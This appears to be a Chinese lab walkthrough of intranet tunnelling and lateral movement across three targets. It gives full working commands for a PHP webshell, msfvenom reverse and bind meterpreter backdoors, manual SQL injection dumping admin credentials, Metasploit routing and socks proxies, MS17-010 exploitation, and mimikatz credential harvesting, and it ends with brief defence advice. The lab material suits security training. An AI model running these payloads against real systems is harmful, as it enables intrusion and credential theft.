内网隧道穿透与横向移动技术详解<\/h1>

一、隧道技术概述<\/h2>

1. 什么是隧道技术<\/h3>
在渗透测试中，进入内网后需要判断流量是否能够出得去、进得来。实际网络环境中，流量会经过许多边界设备（如IDP、IPS、防火墙等），隧道技术就是绕过端口屏蔽的通信方式。<\/p>
隧道工作原理：防火墙两端的数据包通过防火墙允许的数据包类型或端口进行封装，穿过防火墙后解包还原，并将还原后的数据包发送到相应服务器。<\/p>

2. 隧道分类<\/h3>

常见的隧道包括三大类：<\/p>

网络层隧道<\/li>
应用层隧道<\/li>

传输层隧道<\/li> <\/ul>

二、靶场环境搭建<\/h2>

1. 网络拓扑<\/h3>

Target1: 192.168.3.117<\/li>
Target2: 192.168.22.102<\/li>

Target3: 192.168.33.33<\/li> <\/ul>

2. 初始配置<\/h3>

临时配置IP地址（重启后失效）：<\/p>

ifconfig ethx IP\/MASK
<\/span><\/span># 示例<\/span>
<\/span><\/span>ifconfig eth0 192.168.22.22\/24
<\/span><\/span><\/code><\/pre>宝塔面板配置：<\/p>

Target1: 账号eaj3yhsl 密码41bb8fee<\/li>
Target2: 账号xdynr37d 密码123qwe..<\/li>
<\/ul>
三、Target1渗透过程<\/h2>
1. 信息收集<\/h3>

使用dirb扫描网站目录，发现robots.txt中的flag<\/li>
访问index.php发现使用ThinkPHP框架<\/li>
测试ThinkPHP5.x远程命令执行漏洞<\/li>
<\/ol>
2. 漏洞利用<\/h3>
获取网站绝对路径并写入一句话木马：<\/p>
pwd
<\/span><\/span>echo '<?php eval($_POST['<\/span>x']);?>'<\/span> > \/www\/wwwroot\/ThinkPHP\/pu.php
<\/span><\/span><\/code><\/pre>使用菜刀连接大马（密码x）<\/p>
3. MSF后门植入<\/h3>

生成Linux后门：<\/li>
<\/ol>
msfvenom -p linux\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>kali本机地址 LPORT=<\/span>1111<\/span> -f elf > t1.elf
<\/span><\/span><\/code><\/pre>
MSF设置监听：<\/li>
<\/ol>
use exploit\/multi\/handler
<\/span><\/span>set payload linux\/x64\/meterpreter\/reverse_tcp
<\/span><\/span>set LHOST kali本机地址
<\/span><\/span>set LPORT 1111<\/span>
<\/span><\/span>exploit
<\/span><\/span>background
<\/span><\/span><\/code><\/pre>
通过菜刀上传并执行后门：<\/li>
<\/ol>
chmod +777 t1.elf
<\/span><\/span>.\/t1.elf
<\/span><\/span><\/code><\/pre>4. 路由配置<\/h3>

查看网络接口：<\/li>
<\/ol>
run get_local_subnets
<\/span><\/span><\/code><\/pre>
添加22网段路由：<\/li>
<\/ol>
run autoroute -s 192.168.22.0\/24
<\/span><\/span><\/code><\/pre>5. 建立Socks代理<\/h3>

MSF开启本地代理：<\/li>
<\/ol>
use auxiliary\/server\/socks_proxy
<\/span><\/span>set srvport 1080<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>

Windows配置Socks代理（使用SocksCap64）<\/p>
<\/li>

Kali配置proxychains：

编辑\/etc\/proxychains4.conf<\/code>，添加：<\/p>
<\/li>
<\/ol>
socks5 127.0.0.1 1080
<\/code><\/pre>
6. 扫描22网段<\/h3>
方法一：使用proxychains+nmap<\/p>
proxychains nmap -sT -Pn 192.168.22.0\/24 -p80
<\/span><\/span><\/code><\/pre>方法二：使用MSF端口扫描<\/p>
use auxiliary\/scanner\/portscan\/tcp
<\/span><\/span>set rhosts 192.168.22.0\/24
<\/span><\/span>set threads 100<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>四、Target2渗透过程<\/h2>
1. 信息收集<\/h3>

发现192.168.22.102的80端口<\/li>
扫描网站目录（使用代理工具如御剑）<\/li>
在主页源代码中发现SQL注入提示<\/li>
<\/ol>
2. SQL注入利用<\/h3>
方法一：使用SQL工具<\/h4>

配置Socks5代理<\/li>
识别注入点并获取数据<\/li>
<\/ol>
方法二：手工注入<\/h4>

确定注入类型：<\/li>
<\/ol>
' 报错
<\/span><\/span><\/span>" 正常
<\/span><\/span><\/span><\/code><\/pre>
确定列数：<\/li>
<\/ol>
' order by 39%23  # 正常
<\/span><\/span><\/span>'<\/span> order<\/span> by<\/span> 40<\/span>%<\/span>23<\/span>  #<\/span> 报错<\/span>
<\/span><\/span><\/code><\/pre>
获取数据库名：<\/li>
<\/ol>
union<\/span> select<\/span> group_concat(table_name<\/span>),2<\/span>,3<\/span>,...,39<\/span> from<\/span> information_schema.tables where<\/span> table_schema=<\/span>'bagecms'<\/span>%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre>
获取表名：<\/li>
<\/ol>
union<\/span> select<\/span> group_concat(column_name<\/span>),2<\/span>,3<\/span>,...,39<\/span> from<\/span> information_schema.columns where<\/span> table_name<\/span>=<\/span>'bage_admin'<\/span>%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre>
获取账号密码：<\/li>
<\/ol>
union<\/span> select<\/span> username,password,3<\/span>,4<\/span>,...,39<\/span> from<\/span> bagecms.bage_admin limit<\/span> 0<\/span>,1<\/span>%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre>获取的密码为MD5加密，解密后为123qwe<\/code><\/p>
3. 后台Getshell<\/h3>

登录后台<\/li>
通过模板修改写入Webshell<\/li>
使用代理连接菜刀<\/li>
<\/ol>
4. 正向连接后门<\/h3>

生成正向后门：<\/li>
<\/ol>
msfvenom -p linux\/x64\/meterpreter\/bind_tcp LPORT=<\/span>3333<\/span> -f elf > t2.elf
<\/span><\/span><\/code><\/pre>
MSF设置监听：<\/li>
<\/ol>
use exploit\/multi\/handler
<\/span><\/span>set payload linux\/x64\/meterpreter\/bind_tcp
<\/span><\/span>set rhost 192.168.22.102
<\/span><\/span>set LPORT 3333<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>

上传并执行后门<\/p>
<\/li>

添加33网段路由：<\/p>
<\/li>
<\/ol>
run autoroute -s 192.168.33.0\/24
<\/span><\/span><\/code><\/pre>
开启新的Socks代理：<\/li>
<\/ol>
use auxiliary\/server\/socks_proxy
<\/span><\/span>set srvport 1081<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>
更新proxychains配置<\/li>
<\/ol>
五、Target3渗透过程<\/h2>
1. 信息收集<\/h3>

扫描33网段：<\/li>
<\/ol>
proxychains nmap -Pn -sT -T4 192.168.33.33
<\/span><\/span><\/code><\/pre>发现445和3389端口（Windows系统）<\/p>
2. MS17-010漏洞检测<\/h3>
use auxiliary\/scanner\/smb\/smb_ms17_010
<\/span><\/span>set rhosts 192.168.33.33
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>3. 漏洞利用<\/h3>

使用psexec模块：<\/li>
<\/ol>
use exploit\/windows\/smb\/ms17_010_psexec
<\/span><\/span>set payload windows\/meterpreter\/bind_tcp
<\/span><\/span>set RHOSTS 192.168.33.33
<\/span><\/span>set RHOST 192.168.33.33
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>
提权操作：<\/li>
<\/ol>
getsystem
<\/span><\/span>load mimikatz
<\/span><\/span>creds_all
<\/span><\/span><\/code><\/pre>
远程桌面连接<\/li>
<\/ol>
六、关键技术总结<\/h2>

ThinkPHP5.x RCE漏洞利用<\/strong>：三种利用方式及echo写马注意事项<\/li>
MSF路由与代理<\/strong>：

添加路由：run autoroute -s<\/code><\/li>
Socks代理：auxiliary\/server\/socks_proxy<\/code><\/li>
<\/ul>
<\/li>
CMS漏洞利用<\/strong>：SQL注入→后台登录→模板Getshell<\/li>
永恒之蓝利用<\/strong>：MS17-010的psexec模块使用<\/li>
多层网络穿透<\/strong>：通过不断添加路由+Socks代理实现横向移动<\/li>
代理工具<\/strong>：SocksCap64的使用<\/li>
<\/ol>
七、完整渗透流程<\/h2>

外网Web漏洞利用获取初始立足点<\/li>
建立反向连接获取meterpreter会话<\/li>
添加内网路由<\/li>
建立代理通道<\/li>
通过代理进行内网扫描和信息收集<\/li>
利用内网服务漏洞横向移动<\/li>
重复2-6步骤直至到达目标系统<\/li>
获取最终flag完成渗透<\/li>
<\/ol>
八、防御建议<\/h2>

及时修补已知漏洞（如ThinkPHP、MS17-010）<\/li>
网络分段隔离，限制横向移动<\/li>
部署IDS\/IPS检测异常流量<\/li>
加强权限管理，避免权限提升<\/li>
监控代理和隧道行为<\/li>
定期进行安全审计和渗透测试<\/li>
<\/ol>